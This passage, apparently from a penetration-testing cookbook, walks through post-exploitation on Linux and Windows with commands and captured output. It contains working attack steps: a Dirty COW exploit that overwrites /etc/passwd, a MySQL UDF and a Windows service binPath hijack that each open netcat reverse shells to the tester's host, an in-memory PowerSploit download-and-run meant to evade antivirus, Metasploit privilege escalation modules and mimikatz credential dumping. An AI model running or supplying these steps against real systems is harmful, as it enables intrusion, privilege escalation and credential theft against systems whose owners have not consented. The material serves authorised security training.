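        st = os.stat(path)
    except OSError:
        return False
    return bool(st.st_mode & stat.S_IWOTH)


def world_writable_dirs(roots=("/etc", "/opt", "/usr/local", "/home")):
    """World-writable directories without the sticky bit.

    Sticky directories such as /tmp are skipped on purpose: anyone can create
    files there, but nobody can replace or remove another user's files, which
    is what matters when looking for something root will later execute.
    """
    hits = []
    for root in roots:
        for dirpath, _dirs, _files in os.walk(root, onerror=lambda e: None):
            try:
                st = os.stat(dirpath)
            except OSError:
                continue
            if st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
                hits.append(dirpath)
    return hits


def report():
    """Printable summary in the spirit of LinEnum's sections."""
    lines = ["[-] Kernel: %(release)s (%(machine)s)" % kernel_info()]
    for f in find_suid():
        tag = "UNUSUAL " if f["unusual"] else ""
        lines.append("[-] %sSUID/SGID: %s (owner uid %d)" % (tag, f["path"], f["owner_uid"]))
    for d in world_writable_dirs():
        lines.append("[-] World-writable dir without sticky bit: %s" % d)
    return "\n".join(lines)


if __name__ == "__main__":
    print(report())
```

Run it as the low-privileged user you landed as; an UNUSUAL entry owned by uid 0, or a world-writable directory on a path that a root cron job or service reads from, is the lead to follow up by hand.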

Horizontal escalation 


You have already learned how to spawn a TTY shell and perform enumeration. In this recipe, we will 
look at some methods of horizontal escalation, that is, moving from the user we landed as to another, 
still unprivileged, user on the same system whose rights or files get us further. 


How to do it... 


Here, we have a situation where we have got a reverse shell as www-data. 


Running sudo -l (or sudo --list), we find that www-data is allowed to run vim on one configuration file as another user, waldo: 


Matching Defaults entries for www-data on ubuntu: 
    env_reset, mail_badpass, 
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 

User www-data may run the following commands on ubuntu: 
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf 
    (ALL) NOPASSWD: /sbin/iptables 





So we open the config file as waldo with sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf 
(the rule permits only that exact path, so the file name must match), and to get a shell from inside Vim we type 
this at Vim's command line (the colon opens it): 


| :!bash 


The id output in the new shell shows the switch (group list truncated): 

uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),24(cdrom),... 





We now have a shell with the user waldo. So, our escalation was successful. 


In some cases, we may also find SSH material (an authorized_keys file we can write to, or a readable private 
key in another user's ~/.ssh) or saved passwords in configuration files and shell history that let us 
move to another user in the same way. 
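The sudo -l output above is worth reading mechanically, because on a real box the rule list is long and the one entry that runs an editor, pager or interpreter as another user is easy to miss. The following is an added example for this page, not part of the recipe's tooling: it parses sudo -l output and flags rules with a well-known shell escape, saying which user you land as and whether that is a horizontal or a vertical move. SAMPLE is a constructed transcript shaped like the www-data/waldo output, and SHELL_ESCAPES is an illustrative subset, not a complete list.

```python
#!/usr/bin/env python3
"""Triage 'sudo -l' output for rules that can be turned into a shell.

Added example for this page, not part of the recipe's tooling. SAMPLE is a
constructed transcript shaped like the www-data/waldo output above, and
SHELL_ESCAPES is an illustrative subset of well-known escapes.
"""
import os
import re

# program -> what to type once it is running under sudo to get a shell
SHELL_ESCAPES = {
    "vim": ":!bash", "vi": ":!bash",
    "less": "!bash", "more": "!bash", "man": "!bash",
    "find": "<any path> -exec /bin/bash \\;",
    "awk": "'BEGIN {system(\"/bin/bash\")}'",
    "python": "-c 'import os; os.system(\"/bin/bash\")'",
    "perl": "-e 'exec \"/bin/bash\";'",
}

SAMPLE = """\
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables
"""

# "(runas[ : rungroup]) [TAG: ...] command [args][, command [args]]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<rest>.+)$")


def parse_sudo_l(text):
    """Return one dict per allowed command: runas, nopasswd, command, args."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip() or "root"   # "(ALL : ALL)" -> "ALL"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for spec in m.group("rest").split(","):           # several commands on one line
            parts = spec.strip().split(None, 1)
            if parts:
                rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags,
                              "command": parts[0],
                              "args": parts[1] if len(parts) > 1 else ""})
    return rules


def triage(rules):
    """Pick out rules that yield a shell and say which user you land as."""
    findings = []
    for r in rules:
        target = "root" if r["runas"] == "ALL" else r["runas"]
        base = re.sub(r"[\d.]*$", "", os.path.basename(r["command"]))  # python3.8 -> python
        if r["command"] == "ALL":
            escape = "/bin/bash (any command is allowed)"
        elif base in SHELL_ESCAPES:
            escape = SHELL_ESCAPES[base]
        else:
            continue
        invoke = ("sudo -u %s %s %s" % (target, r["command"], r["args"])).rstrip()
        findings.append({"target": target,
                         "kind": "vertical" if target == "root" else "horizontal",
                         "nopasswd": r["nopasswd"], "invoke": invoke, "escape": escape})
    return findings


if __name__ == "__main__":
    for f in triage(parse_sudo_l(SAMPLE)):
        print("%-10s -> %s%s\n    %s\n    then: %s" % (
            f["kind"], f["target"], "" if f["nopasswd"] else " (password needed)",
            f["invoke"], f["escape"]))
```

Feed it the real output (sudo -l > /tmp/s.txt, then parse_sudo_l(open("/tmp/s.txt").read())). The iptables rule is correctly left alone: it runs as root but offers no shell escape, which is exactly the distinction the triage is meant to make.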





Vertical escalation 


In this recipe, we will look at some examples of how we can gain access to the root account on a 
compromised box. The key to a successful escalation is to gather as much information as possible about the 
system. 


How to do it... 


The first step of rooting any box would be to check whether there are any publicly available local root 
exploits for the kernel version in use: 


1. We can use scripts such as Linux Exploit Suggester. It is a Perl script to which we give the kernel 
version, and it shows us the publicly available exploits that might give us root privileges. The script 
can be downloaded from https://github.com/PenturaLabs/Linux_Exploit_Suggester: 


| git clone https://github.com/PenturaLabs/Linux_Exploit_Suggester.git 




README.md 


Linux_Exploit_Suggester 


Linux Exploit Suggester; based on operating system release number. 


This program, run without arguments, will perform a 'uname -r' to grab the Linux Operating Systems release version, 
and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script. 


Additionally possible to provide '-k' flag to manually enter the Kernel Version/Operating System Release Version. 


This script has been extremely useful on site and in exams. Now Open-sourced under GPLv2. 


2. Now we go to the directory using the cd command: 


| cd Linux_Exploit_Suggester/ 


3. It is simple to use; we can find the kernel version with this command: 


| uname -a 


4. We can also use the enumeration scripts that we saw in the previous recipe. Once we have the 
version, we can use it with our script with the following command: 


| perl Linux_Exploit_Suggester.pl -k 2.6.18 


# perl Linux_Exploit_Suggester.pl -k 2.6.18 
Kernel local: 2.6.18 

Searching among 65 exploits... 

Possible Exploits: 
[+] american-sign-language 
... 
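The README's warning that a back-ported patch may fool this script is the important caveat: the suggester compares nothing but the release number. The following is an added example for this page, not Linux_Exploit_Suggester's own code, that does the same comparison and then shows where a distribution's ABI (build) number changes the answer. The upstream fix version for Dirty COW (CVE-2016-5195) is 4.8.3; the Ubuntu 14.04 ABI threshold of 100 is an assumed value used for illustration and should be checked against the distribution's security notice before relying on it.

```python
#!/usr/bin/env python3
"""Match a kernel release string against a fix version, the way Linux
Exploit Suggester keys on 'uname -r', and show why the answer is only a hint.

Added example for this page, not code from Linux_Exploit_Suggester. Dirty COW
(CVE-2016-5195) was fixed in upstream 4.8.3; the Ubuntu 14.04 ABI threshold
below is an assumed value for illustration, to be verified against the
distribution's security notice.
"""
import re

DIRTYCOW_FIXED_UPSTREAM = (4, 8, 3)
UBUNTU_TRUSTY_DIRTYCOW_FIXED_ABI = 100        # assumed: 3.13.0-100 and later are patched

UNAME_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(\d+))?(?:-(.+))?$")


def parse_uname_r(release):
    """'3.13.0-32-generic' -> ((3, 13, 0), 32, 'generic').

    The middle value is the distribution's ABI/build number, which is where
    backported fixes show up; it is None for a vanilla release like '4.9.0'.
    """
    m = UNAME_RE.match(release.strip())
    if not m:
        raise ValueError("unrecognised release string: %r" % release)
    major, minor, patch, abi, flavour = m.groups()
    version = (int(major), int(minor), int(patch or 0))
    return version, (int(abi) if abi else None), flavour


def upstream_vulnerable(version, fixed_in):
    """Pure version-number comparison: True if version predates fixed_in."""
    return tuple(version) < tuple(fixed_in)


def assess(release, fixed_upstream=DIRTYCOW_FIXED_UPSTREAM, backport_fixed_abi=None):
    """Combine the upstream comparison with an optional distro backport threshold.

    backport_fixed_abi is the first ABI number of the distribution kernel
    series that carries the fix; pass None if you do not know it.
    """
    version, abi, flavour = parse_uname_r(release)
    result = {"version": version, "abi": abi, "flavour": flavour,
              "upstream_says_vulnerable": upstream_vulnerable(version, fixed_upstream)}
    if not result["upstream_says_vulnerable"]:
        result["verdict"] = "not vulnerable by version"
    elif backport_fixed_abi is not None and abi is not None and abi >= backport_fixed_abi:
        result["verdict"] = "patched by backport"      # the case that fools the suggester
    elif backport_fixed_abi is None and abi is not None:
        result["verdict"] = "likely vulnerable (check distro changelog for a backport)"
    else:
        result["verdict"] = "likely vulnerable"
    return result


if __name__ == "__main__":
    for rel in ("3.13.0-32-generic", "3.13.0-100-generic", "4.9.0"):
        verdict = assess(rel, backport_fixed_abi=UBUNTU_TRUSTY_DIRTYCOW_FIXED_ABI)["verdict"]
        print("%-20s -> %s" % (rel, verdict))
```

The 3.13.0-32 kernel the recipe exploits below comes out as likely vulnerable, while 3.13.0-100 with the same upstream version comes out as patched, which is the distinction a bare release-number match cannot make; when you do not know the distribution's threshold, the verdict tells you to go and look it up (apt changelog or the vendor advisory) before burning time on an exploit.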





Let's try using one of the exploits; we will use the latest one at the time of writing, Dirty COW (CVE-2016-5195). 


This is the definition of Dirty COW as given by Red Hat: a race condition was found in the way the 
Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only 
memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read- 
only memory mappings and thus increase their privileges on the system. 


The exploit code can be seen on Exploit-DB at https://www.exploit-db.com/exploits/40839/. This particular exploit 
does not append a user; it uses the flaw to overwrite the root line of /etc/passwd with a new UID 0 account 
(firefart by default) after backing the file up to /tmp/passwd.bak: 




EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the 

This exploit uses the pokemon exploit of the dirtycow vulnerability 
as a base and automatically generates a new passwd line. 

The user will be prompted for the new password when the binary is run. 
The original /etc/passwd file is then backed up to /tmp/passwd.bak 
and overwrites the root account with the generated line. 

After running the exploit you should be able to login with the newly 
created user. 

To use this exploit modify the user values according to your needs. 
The default is "firefart". 

Original exploit (dirtycow's ptrace_pokedata "pokemon" method): 
https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c 

Compile with: 
gcc -pthread dirty.c -o dirty -lcrypt 

Then run the newly create binary by either doing: 
"./dirty" or "./dirty my-new-password" 

Afterwards, you can either "su firefart" or "ssh firefart@..." 

DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT! 
mv /tmp/passwd.bak /etc/passwd 

Exploit adopted by Christian "FireFart" Mehlmauer 
https://firefart.at 


We download the exploit and save it in the server's /tmp directory. It's written in C, so we compile it 
with gcc on the server itself (if the target has no compiler, build it on a machine of the same architecture 
and upload the binary) using the following command: 


| gcc -pthread dirty.c -o <outputname> -lcrypt 


www-data@Sedna:/tmp$ gcc -pthread -o dirty 40839.c -lcrypt 
www-data@Sedna:/tmp$ ./dirty 
/etc/passwd successfully backed up to /tmp/passwd.bak 
Please enter the new password: firefart 
Complete line: 
firefart:fik57D3GJz/tk:0:0:pwned:/root:/bin/bash 





gcc already produces an executable file; if we uploaded a prebuilt binary instead, we make it executable first: 


| chmod +x dirty 


Then we run it using ./dirty. We will probably lose our back-connect shell (the exploit is hard on the kernel), 
but if everything goes well, we can now ssh into the machine as root with the username firefart and the 
password we typed (firefart above). 


We try the ssh using this command: 

| ssh -l firefart <IP Address> 


:~# ssh -l firefart 192.168.1.159 
firefart@192.168.1.159's password: 
Added user firefart. 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686) 

 * Documentation:  https://help.ubuntu.com/ 

  System information as of Thu Mar 16 09:11:50 EDT 2017 

  System load:  0.0               Memory usage: 5%   Processes:       60 
  Usage of /:   29.7% of 7.26GB   Swap usage:   0%   Users logged in: 0 

  Graph this data and manage this system at: 
    https://landscape.canonical.com/ 

Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126 
firefart@Sedna:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs 





Now, Dirty COW is a bit unstable: the exploit's threads race the kernel's page write-back and the machine can 
hang. The exploit's own note suggests this workaround, run right after logging in, to make the system more stable: 

| echo 0 > /proc/sys/vm/dirty_writeback_centisecs 

Let's execute the id command; we see that we are now root on the system (UID 0, even though the name is firefart): 


firefart@Sedna:~# id 
uid=0(firefart) gid=0(root) groups=0(root) 


Remember to restore the original file (mv /tmp/passwd.bak /etc/passwd) once we have a root shell; until then the 
real root account's entry is gone. 


Now let's look at another method to achieve root. In this situation, we will assume that we have a shell 
on the system and the enumeration scripts we ran showed that the MySQL server process (mysqld) is running as 
root. Check this with ps aux | grep mysql: on a default modern install it runs as the unprivileged mysql 
user, in which case the technique below only gives us a shell as that user. 





MySQL can load User Defined Functions (UDFs) from shared libraries; let's look at a way to get root via UDF 
injection. We have two options: download the lib_mysqludf_sys source and compile it on the compromised system, 
or download the precompiled library from https://github.com/mysqludf/lib_mysqludf_sys/blob/master/lib_mysqludf_sys.so. 
The library must match the server's architecture (32- versus 64-bit), and it has to end up in MySQL's plugin 
directory, which we can find with SHOW VARIABLES LIKE 'plugin_dir'. On newer servers the secure_file_priv 
setting may restrict load_file() and INTO DUMPFILE to a single directory, or disable them entirely. 





Once it has been downloaded, we log in to the database. Often people leave the default root password 
blank; otherwise we can get one from the config files of the web application running on the server. 


Now, we create a table, read the library into it with load_file(), and write it back out into the plugin 
directory with INTO DUMPFILE (which writes the raw bytes, unlike INTO OUTFILE): 


create table <table name> (hello blob); 
insert into <table name> values (load_file('/path/to/mysqludf.so')); 
select * from <table name> into dumpfile '/usr/lib/mysql/plugin/mysqludf.so'; 


The plugin path above is the one on the recipe's target; substitute the plugin_dir value of the server 
you are on. 





For Windows systems, the commands are the same; only the plugin directory path (and the .dll 
extension) differs. 





Next, we create the sys_eval function from the library, which will let us run system commands as the user 
mysqld runs as (root here). The library defines sys_eval as returning a string holding the command's output 
(declaring it as integer, as the recipe's screenshot did, may still run the command but garbles what comes 
back; sys_exec is the variant that returns an integer exit status). For Windows, we run this command: 


| CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys_32.dll'; 


For Linux, we run this command: 


| CREATE FUNCTION sys_eval RETURNS string SONAME 'mysqludf.so'; 


Now we can use sys_eval for anything we want; for example, to back-connect, we can use this (the query 
blocks for as long as the command runs, which is fine for a reverse shell): 


| select sys_eval('nc -v <our IP> <our Port> -e /bin/bash'); 





This will give us a reverse shell as root on the system: 


:~# nc -lvp 1234 
Listening on [any] 1234 ... 
connect to [...] from (UNKNOWN) [...] 
id 
uid=0(root) gid=0(root) groups=0(root) 


There are other ways too, such as using sys_eval to append our current user to the sudoers file or to copy /etc/shadow somewhere readable. It's all up to our imagination. 


Node hopping — pivoting 


Once we are in one system on the network, we need to look for other machines on that network. 
Information gathering is the same as what we learned in the previous chapters: we can start by installing 
(or uploading a static build of) nmap to look for other hosts and the applications or services running on 
them. In this recipe, you will learn a few tricks to reach ports on those internal networks from our own machine. 


How to do it... 


Let's assume we have shell access to a machine. We run ifconfig and find that the machine has interfaces on 
two networks, 192.168.1.0/24 (the one we came in from) and an internal 192.168.122.0/24: 


thebobs@Initech-DMZ01:~$ ifconfig 
eth0      Link encap:Ethernet  HWaddr 00:0c:29:59:79:84 
          inet addr:192.168.1.5  Bcast:192.168.1.255  Mask:255.255.255.0 
          inet6 addr: fe80::20c:29ff:fe59:7984/64 Scope:Link 
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1 
          RX packets:6950 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:182 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:436168 (436.1 KB)  TX bytes:21779 (21.7 KB) 

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0 
          inet6 addr: ::1/128 Scope:Host 
          UP LOOPBACK RUNNING  MTU:65536  Metric:1 
          RX packets:9 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B) 

          Link encap:Ethernet  HWaddr fe:54:00:4b:73:5f 
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0 
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1 
          RX packets:24 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:13 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:2796 (2.7 KB)  TX bytes:2059 (2.0 KB) 





Now we nmap-scan the 192.168.122.0/24 network from this host and find some machines with a couple of ports 
open. Let's look at a simple way of pivoting so that we can reach an application running on that other 
network from our own machine. 


We will do an SSH local port forward, which needs SSH credentials for the compromised host (thebobs here). 
The syntax is: 


| ssh -L <our port>:<remote ip>:<remote port> username@IP 


:~# ssh -L 9001:192.168.122.65:80 thebobs@192.168.1.5 





Once this is done, we open the browser and go to http://127.0.0.1:9001/, the local port we chose. SSH carries 
the connection to the pivot host, which opens it to 192.168.122.65:80, and the intranet site on the internal 
host (an Initech employee directory in this example) loads in our browser. 


We will have access to the application running on the remote host. 


There's more... 


There are other ways to port forward; for example, a dynamic forward (ssh -D <local port> username@IP) turns 
the SSH connection into a SOCKS proxy, and proxychains can then route any tool through it into the other subnet. 
Some of these techniques can be found at https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/. 


Privilege escalation on Windows 


In this recipe, you will learn a few ways to get an administrator (or SYSTEM) account on a Windows server. There 
are multiple ways to get administrator rights on a Windows system; let's look at a few of them. 


How to do it... 


Once we have meterpreter on the system, we can try Metasploit's infamous getsystem command, which attempts 
three different techniques to elevate to SYSTEM. To view the help, we type this: 


| getsystem -h 


meterpreter > getsystem -h 
Usage: getsystem [options] 

Attempt to elevate your privilege to that of local system. 

OPTIONS: 

    -h        Help Banner. 
    -t <opt>  The technique to use. (Default to '0'). 
                0 : All techniques available 
                1 : Service - Named Pipe Impersonation (In Memory/Admin) 
                2 : Service - Named Pipe Impersonation (Dropper/Admin) 
                3 : Service - Token Duplication (In Memory/Admin) 

meterpreter > 


To try and get admin, we type the following command: 


| getsystem 





We can see we are now NT AUTHORITY\SYSTEM. Note the /Admin tag on every technique: getsystem takes an already 
administrative (high-integrity) session to SYSTEM; from a plain user, or from an administrator still boxed in 
by UAC, it fails, so we need another way to get SYSTEM. We will look at some ways to reconfigure Windows services. 


We will use sc (the service control command-line tool) to configure Windows services. 
Let's look at the upnphost service: 


| sc qc upnphost 


SERVICE_NAME: upnphost 


First, we upload our netcat binary to the system. Then, provided our user has SERVICE_CHANGE_CONFIG on the 
service (check with accesschk.exe -ucqv upnphost from Sysinternals), we can change the binary path of the 
service to our binary (note sc's syntax: the space after binPath= is required): 


| sc config upnphost binPath= "<path to netcat>\nc.exe -nv <our IP> <our port> -e C:\WINDOWS\System32\cmd.exe" 


C:\Documents and Settings\test\Desktop>sc config upnphost binpath= "C:\nc.exe -nv 192.168.110.41 1234 -e C:\Windows\System32\cmd.exe" 
[SC] ChangeServiceConfig SUCCESS 





sc config upnphost obj= ".\LocalSystem" password= "" 


C:\Documents and Settings\test\Desktop>sc config upnphost obj= ".\LocalSystem" password= "" 
[SC] ChangeServiceConfig SUCCESS 

C:\Documents and Settings\test\Desktop>sc qc upnphost 
SERVICE_NAME: upnphost 
        TYPE               : WIN32_SHARE_PROCESS 
        BINARY_PATH_NAME   : C:\nc.exe -nv 192.168.110.41 1234 -e C:\Windows\System32\cmd.exe 
        DISPLAY_NAME       : Universal Plug and Play Device Host 
        SERVICE_START_NAME : LocalSystem 

C:\Documents and Settings\test\Desktop> 





Now we need to restart the service, and once that's done, we should have a back connection with SYSTEM 
privileges: 


|net start upnphost 


net start will most likely report that the service failed to respond (error 1053), because nc.exe never talks 
to the service control manager. The shell is spawned anyway, but the process may be terminated when the SCM 
gives up after about 30 seconds, so use the window to start something longer-lived. Instead of netcat, we can 
also point binPath= at net user <name> <password> /add and then at net localgroup administrators <name> /add, 
restarting the service each time, to create a new administrator. 


Now let's try another method: Metasploit has a lot of different local exploits for Windows. 
To view them, we type in msfconsole use exploit/windows/local/ and press Tab twice: 


exploit/windows/local/adobe_sandbox_adobecollabsync 
exploit/windows/local/agnitum_outpost_acs 
... 
exploit/windows/local/bypassuac_eventvwr 
exploit/windows/local/bypassuac_injection 
exploit/windows/local/bypassuac_vbs 
exploit/windows/local/capcom_sys_exec 
... 
exploit/windows/local/mqac_write 


We will use kitrap0d (MS10-015) to exploit: use exploit/windows/local/ms10_015_kitrap0d. We set our meterpreter 
session and payload: 


msf exploit(ms10_015_kitrap0d) > set SESSION 1 
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp 
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.110.6 
msf exploit(ms10_015_kitrap0d) > set LPORT 4443 
msf exploit(ms10_015_kitrap0d) > show options 

Module options (exploit/windows/local/ms10_015_kitrap0d): 

   Name     Current Setting  Required  Description 
   ----     ---------------  --------  ----------- 
   SESSION  1                yes       The session to run this module on. 

Payload options (windows/meterpreter/reverse_tcp): 

   Name      Current Setting  Required  Description 
   ----      ---------------  --------  ----------- 
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none) 
   LHOST     192.168.110.6    yes       The listen address 
   LPORT     4443             yes       The listen port 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Windows 2K SP4 - Windows 7 (x86) 





We then run the exploit: 


msf exploit(ms10_015_kitrap0d) > exploit 

[*] Started reverse handler on 192.168.110.6:4443 
[*] Launching notepad to host the exploit... 
[+] Process 4048 launched. 
[*] Reflectively injecting the exploit DLL into 4048... 
[*] Injecting exploit into 4048 ... 
[*] Exploit injected. Injecting payload into 4048... 
[*] Payload injected. Executing exploit... 
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete. 
[*] Sending stage (769024 bytes) to 192.168.110.7 
[*] Meterpreter session 2 opened (192.168.110.6:4443 -> 192.168.110.7:49204) at 2017-03-11 11:14:00 -0400 

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 





We have SYSTEM. Let's use one more exploit: the infamous bypassuac: 


| use exploit/windows/local/bypassuac 


We now set the session of the meterpreter we have on the system: 


| set session 1 


This module is a UAC bypass, not a privilege escalation: it first checks that our user is a member of the 
local Administrators group and stops if not. When that check passes, we run it and see a second meterpreter, 
now with a high-integrity token, open for us (the output reports the Administrators group check, uploads the 
module's agent, and opens the new session on our handler port). 





Using PowerSploit 


With the launch of PowerShell, new ways to exploit Windows machine also came in. As described by 
Wikipedia, PowerShell (including Windows PowerShell and PowerShell Core) is a task automation and 
configuration management framework from Microsoft, consisting of a command-line shell and associated 
scripting language built on the .NET Framework. 


In this recipe, we will use PowerSploit, which is a PowerShell-based post exploitation framework to 
gain access to meterpreter on a system. 


How to do it... 


Following are the steps to use PowerSploit: 


1. We will now assume a situation in which we have a Windows-based environment in which we have 
managed to gain shell access. We do not have admin rights on the system. 


2. Let's look at a cool way of getting a meterpreter without actually writing a file to disk, using 
PowerSploit. It comes built into Kali (in the application menu under Post Exploitation, alongside nishang, 
weevely and proxychains). 


3. The trick here is to download a PowerShell script and load it straight into memory; as it is never 
saved to the hard disk, file-scanning antivirus will not see it (newer Windows versions add AMSI, which 
can still inspect script content as it runs). 


4. We first check whether PowerShell is installed by running powershell: 


Windows PowerShell 
Copyright (C) 2009 Microsoft Corporation. All rights reserved. 





5. Inside that PowerShell session we download and load the script with the command below. Using single 
quotes around the URL is important; else, we may get a missing parenthesis error. The functions it defines 
exist only in the PowerShell process that ran it, so the following steps must be typed in the same session 
(running them as separate powershell ... invocations from cmd starts a fresh process each time and loses them): 


IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') 


PS C:\Users\...> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') 





6. We should not see any error. Now that our script is loaded, we look at the module's help with the 
following command: 


Get-Help Invoke-Shellcode 


NAME 
    Invoke-Shellcode 

SYNOPSIS 
    Inject shellcode into the process ID of your choosing or within the context 
    of the running PowerShell process. 

    PowerSploit Function: Invoke-Shellcode 
    Author: Matthew Graeber (@mattifestation) 
    License: BSD 3-Clause 
    Required Dependencies: None 
    Optional Dependencies: None 

SYNTAX 
    Invoke-Shellcode [-ProcessID <UInt16>] [-Shellcode <Byte[]>] [-Force] [-WhatIf] [-Confirm] [<CommonParameters>] 

    Invoke-Shellcode [-ProcessID <UInt16>] [-Payload <String>] -Lhost <String> 


7. Now we run the module from the same session. Later PowerSploit versions dropped the -Payload, -Lhost and 
-Lport parameters from Invoke-Shellcode; with those, generate the stager with msfvenom -p 
windows/meterpreter/reverse_https LHOST=... LPORT=... -f powershell and pass the byte array via -Shellcode 
instead: 


Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.110.33 -Lport 4444 -Force 





8. Before running Invoke-Shellcode, we start our handler in msfconsole with the matching payload, LHOST and LPORT: 


msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https 
msf exploit(handler) > set LHOST 192.168.110.33 
msf exploit(handler) > set LPORT 4444 
msf exploit(handler) > exploit 





9. We should have a meterpreter now: 


[*] Started HTTPS reverse handler on https://0.0.0.0:4444/ 
[*] Starting the payload handler... 
[*] 192.168.1.5:49238 Request received for /INITM... 
[*] 192.168.1.5:49238 Staging connection for target /INITM received... 
[*] Patched user-agent at offset 663246... 
[*] Patched transport at offset 663320... 
[*] Patched URL at offset 663384... 
[*] Patched Expiration Timeout at offset 664256... 
[*] Patched Communication Timeout at offset 664260... 
[*] Meterpreter session 1 opened (192.168.110.33:4444 -> 192.168.110.5:49230) at 2017-04-05 09:35:10 -0500 

meterpreter > 


10. Now since we have meterpreter, we can use any of the recipes mentioned earlier to get system rights. 


There's more... 


PowerSploit has lots of PowerShell modules that can be used for further exploitation, such as gaining 
privileges, bypassing antivirus, and so on. 


We can read all about this at: 


https://github.com/PowerShellMafia/PowerSploit 
https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535/ 


Pulling plaintext passwords with mimikatz 


Now that we have a meterpreter, we can use it to dump passwords from memory. Mimikatz is a great 
tool for this: it reads credential material out of the LSASS process. 
As defined by the creator of mimikatz himself: 


"It is made in C and considered as some experiments with Windows security. It's now well known to 
extract plaintext passwords, hash, PIN code and kerberos tickets from memory. Mimikatz can also 
perform pass-the-hash, pass-the-ticket or build Golden tickets." 


How to do it... 


Following are the steps to use mimikatz: 


1. Once we have meterpreter with SYSTEM privileges (reading LSASS needs them), we load up mimikatz using this 
command (the mimikatz extension has since been superseded by the kiwi extension, load kiwi, which offers 
equivalent commands): 
| load mimikatz 


Mimikatz Commands 
================= 

    Command           Description 
    -------           ----------- 
    kerberos          Attempt to retrieve kerberos creds 
    livessp           Attempt to retrieve livessp creds 
    mimikatz_command  Run a custom command 
    msv               Attempt to retrieve msv creds (hashes) 
    ssp               Attempt to retrieve ssp creds 
    tspkg             Attempt to retrieve tspkg creds 
    wdigest           Attempt to retrieve wdigest creds 





2. To view all the options, we type this command: 


| help mimikatz 


3. Now, to retrieve hashes from memory, we use the extension's msv command: 


| msv 


meterpreter > msv 
[+] Running as SYSTEM 
[*] Retrieving msv credentials 
...                              Password 
...                              lm{ aad3b435b51404eeaad3b435... }, ntlm{ ... } 
NT AUTHORITY  LOCAL SERVICE      n.s. (Credentials KO) 
WORKGROUP     WIN-UH33216CD08$   n.s. (Credentials KO) 

meterpreter > 





4. We can see the NTLM hashes of the logged-on users (the LM value aad3b435b51404eeaad3b435b51404ee is the 
well-known hash of an empty LM password, which simply means no LM hash is stored; rows marked 
n.s. (Credentials KO) are sessions with nothing to harvest). To view Kerberos credentials, we type this: 


| kerberos 


meterpreter > kerberos 
[+] Running as SYSTEM 
[*] Retrieving kerberos credentials 
kerberos credentials 
==================== 

AuthID   Package    Domain           User              Password 
------   -------    ------           ----              -------- 
0;76485             WIN-UH33216CD08  bugsbounty 
0;76445             WIN-UH33216CD08  bugsbounty 
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE 
0;996    Negotiate  WORKGROUP        WIN-UH33216CD08$ 
0;25380  NTLM 
0;999    NTLM       WORKGROUP        WIN-UH33216CD08$ 





The Password column is empty because this is a standalone workgroup machine with no Kerberos tickets in memory; on a domain-joined host they would have been shown here, and on older Windows (up to 8.0/2012, where WDigest still caches plaintext by default) the wdigest command typically returns the plaintext password as well. 
